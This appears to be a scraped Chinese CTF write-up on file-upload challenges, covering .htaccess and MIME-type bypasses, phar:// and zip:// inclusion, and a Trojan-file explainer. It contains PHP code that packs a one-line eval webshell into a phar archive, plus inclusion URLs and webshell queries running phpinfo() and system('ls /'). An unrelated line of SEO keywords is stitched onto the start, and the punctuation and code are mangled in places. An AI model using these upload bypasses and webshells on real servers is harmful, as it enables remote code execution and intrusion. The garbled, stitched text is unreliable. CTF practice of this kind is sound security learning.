衡水企业网站建设,做企业网站设计价格是多少,智慧团建登录入口官网手机版,怎么做页码[GXYCTF 2019]BabyUpload
知识点#xff1a;文件上传.htaccessMIME绕过
题目直接给题目标签提示文件上传的类型 思路#xff1a;先上传.htaccess文件#xff0c;在上传木马文件#xff0c;最后蚁剑连接
上传.htaccess文件 再上传一个没有?的shell 但是要把image/pn…[GXYCTF 2019]BabyUpload
知识点文件上传.htaccessMIME绕过
题目直接给题目标签提示文件上传的类型 思路先上传.htaccess文件在上传木马文件最后蚁剑连接
上传.htaccess文件 再上传一个没有?的shell 但是要把image/png 改成image/jpeg不然会被拦截过滤 蚁剑连接 找到flag [NISACTF 2022]bingdundun~
知识点文件上传PHP伪协议phar
环境只能上传图片或压缩包 上传一个图片马上传成功了但是蚁剑返回的数据为空 抓包看一下文件类型和上一题的一样但是上传还是成功了问题就是蚁剑连接没有数据 改文件类型结果还是一样 看了wp之后才知道要上传phar文件
?php$phar new Phar(exp.phar); $phar-startBuffering();$phar-setStub(?php __HALT_COMPILER(); ?); $phar-addFromString(test.php, ?php eval($_REQUEST[8]);?); $phar-stopBuffering();
?
生成了exp.phar里面的test.php里就写了一句话木马defender报毒警告
这个冰墩墩有点挑只喜欢压缩包和图片用zip处理 将exp.phar重命名为exp.zip上传成功 然后你需要观察可以看到在打开靶机后有个upload超链接点进去发现url加上了一个参数“bingdundun”如下
http://1.14.71.254:xxxxx/?bingdundunupload
传参 http://1.14.71.254:xxxxx/?bingdundunphar://xxxxxxxxxxxxxxxxxxxxxxxx.zip/67 然后就是进行蚁剑连接但是一直返回数据为空 如果直接上传木马的压缩包会直接报毒最好就是改后缀上传
别人的wp 但是到我这就会一直连不上蚁剑页面的回显还一直是index.php
所以到这我有点疑惑
笔记
phar:// 环境可上传png、zip 首先写一个一句话木马shell.php接着压缩成zip文件。上传文件后使用shell工具进行连接。 http://localhost/?urlphar://uploads/63e93ffe53f03e93bb0a0249152d243874e31c9b.zip/shell zip:// 环境可上传png、zip 首先写一个一句话木马shell.php接着压缩成zip文件。直接上传zip文件然后使用shell工具进行连接。 http://localhost/?urlzip:///var/www/html/upload/892e38cea0c47c744ecc60ccacc94c23.zip%23shell PHP 伪协议 phar:// PHP 伪协议 phar:// 是一种用于访问和操作 PHP 归档文件.phar 文件的协议。它可以被滥用并导致文件上传漏洞。 当服务器端应用程序接受用户上传的文件并未进行充分验证时攻击者可能会利用此漏洞通过上传一个伪装成图片或其他类型文件的 PHP 代码文件来执行恶意代码。 具体来说当攻击者上传一个以 phar:// 开头的文件名到服务器时PHP 在处理该文件时会将其视为一个归档文件并尝试解析。攻击者可以构造恶意的 .phar 文件在其中包含 PHP 代码然后将文件名伪装成其他类型的文件扩展名例如 image.png。 一旦服务器端应用程序接受并存储了这个文件攻击者可以通过请求绕过文件类型验证然后再通过 phar:// 协议来访问该文件。这将导致 PHP 解析并执行该文件中嵌入的恶意代码从而使攻击者能够在服务器上执行任意的操作或获取敏感信息。 使用
当使用 phar:// 伪协议时PHP 解析引擎会将该协议作为资源封装器来处理允许访问和操作 .phar 归档文件中的内容。以下是 phar:// 伪协议的一些常见用法 访问 .phar 归档文件中的文件可以通过指定 .phar 文件的路径来访问其中包含的文件。例如phar://path/to/archive.phar/file.txt 可以访问归档文件 archive.phar 中的 file.txt。 读取 .phar 归档文件中的内容可以像读取普通文件一样使用 file_get_contents() 或 fopen() 等函数来读取 .phar 归档文件中的内容。 执行 .phar 归档文件中的代码可以使用 include 或 require 等 PHP 包含文件的函数来执行 .phar 归档文件中的 PHP 代码。这是利用 phar:// 协议进行文件上传漏洞攻击的关键。 [MoeCTF 2022]what are y0u uploading
知识点文件上传特洛伊文件
进入环境简单上传一张图片得到的回显是 一看还规定了上传的文件名
那就重新上传文件更改文件名 最后得到的回显就是flag 拓展
特洛伊文件
特洛伊文件Trojan file是一种恶意软件文件通常通过欺骗用户下载和执行来感染计算机系统。它通常伪装成看似无害或有用的文件并通过破坏计算机系统的安全性来实现攻击。
特洛伊文件得名于古希腊传说中的特洛伊木马因为它们隐藏在看似无害的文件中以欺骗用户为手段。
特洛伊文件可以采取多种形式例如文档、多媒体文件或执行文件等。攻击者可以将其放置在可信任的下载网站或通过恶意附件的方式伪装成电子邮件发送给受害者。当用户下载和运行这些文件时特洛伊文件就开始感染计算机系统并且在计算机系统中执行各种恶意活动如窃取用户敏感信息、控制计算机、损坏数据等。
危害
当特洛伊文件被执行时它可能会执行以下一些恶意活动 后门访问特洛伊文件可能在受感染的计算机上创建一个后门使攻击者可以远程访问和控制计算机。这样攻击者可以执行各种恶意操作例如窃取信息、安装其他恶意软件、删除文件等。 信息窃取特洛伊文件可以用于窃取用户的敏感信息例如登录凭据、银行账户信息、个人身份信息等。这些信息可以被用于个人利益或进一步的攻击行动。 键盘记录某些特洛伊文件可以监视用户的键盘输入记录敲击的按键以获取密码和其他敏感信息。 拒绝服务攻击DDoS特洛伊文件可以使受感染的计算机成为一个“僵尸”机器并与其他被感染的计算机一起发起分布式拒绝服务攻击。这将导致目标服务器过载无法正常提供服务。 损坏或删除文件特洛伊文件可以对系统文件、个人文件或重要数据进行破坏或删除。 [SWPUCTF 2022 新生赛]Ez_upload
知识点文件上传.htaccessMIME绕过
根据题目标签上传.htaccess文件 接着上传图片马跟第一题的上传类型一样要改文件类型 蚁剑连接成功 但是flag不在flag文件里 看到别人的wp发现flag不在文件中而是在phpinfo中但是flag好像被人删了
http://node5.anna.nssctf.cn:28004/upload/9ad9b10d407fbc93c318338c4db0314b/1234.png?cmdphpinfo(); http://node5.anna.nssctf.cn:28004/upload/9ad9b10d407fbc93c318338c4db0314b/1234.png?cmdsystem(%22ls/%22);